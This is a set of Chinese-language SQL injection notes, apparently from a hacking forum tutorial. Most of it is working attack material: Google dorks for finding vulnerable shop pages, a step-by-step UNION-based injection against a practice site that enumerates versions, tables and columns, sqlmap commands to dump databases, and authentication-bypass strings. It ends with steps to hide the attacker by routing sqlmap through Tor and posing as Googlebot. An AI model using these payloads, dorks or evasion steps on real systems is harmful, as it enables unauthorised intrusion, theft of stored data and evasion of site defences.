参考文章
参考学习:http://bbs.pediy.com/thread-218235.htm
Google search:
inurl:"products.php?prodID="
inurl:buy.php?category=
http://testphp.vulnweb.com/listproducts.php?cat=1
http://testphp.vulnweb.com/listproducts.php?cat='
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+6
http://testphp.vulnweb.com/listproducts.php?cat=1+union+select+1,2,3,4,5,6,7,8,9,10,11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,@@version
有时服务器不能直接理解@@ version命令,需要转换它。您将需要使用convert(@@版本使用latin1)或unhex(hex(@@版本))替换@@版本。
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,table_name+from+information_schema.tables
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(table_name)+from+information_schema.tables+where+table_schema=database()
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(column_name)+from+information_schema.columns+where+table_name=0x4556454e5453
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME)+from+information_schema.CHARACTER_SETS
http://testphp.vulnweb.com/listproducts.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(CHARACTER_SET_NAME,0x3a,DEFAULT_COLLATE_NAME,0x3a,DESCRIPTION,0x3a,MAXLEN)+from+information_schema.CHARACTER_SETS
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns
SQL注入攻击的类型
经典SQLI
盲注或推断SQL注入数据库管理系统
特定的SQLI
复合SQLI
SQL注入+认证不足
SQL注入+ DDoS 攻击
SQL注入+ DNS劫持
SQL注入+ XSS
错误过滤的转义字符
当用户输入未针对转义字符 进行过滤时,会发生这种形式的SQL注入 ,然后将其传递到SQL语句
statement = "SELECT*FROM users WHERE name ='" + userName + "';"
使用注释甚至阻止查询的其余部分(有三种类型的SQL注释)。所有三行最后都有一个空格:
' or '1'='1' --
' or '1'='1' ({
' or '1'='1' /*
http://books.example.com/showReview.php?ID=5 AND substring(@@version,1,1)=4
apt-get instal tor
tor
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5
伪装成Googlebot:
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=2 --tor --tor-type=SOCKS5 --user-agent="Googlebot (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"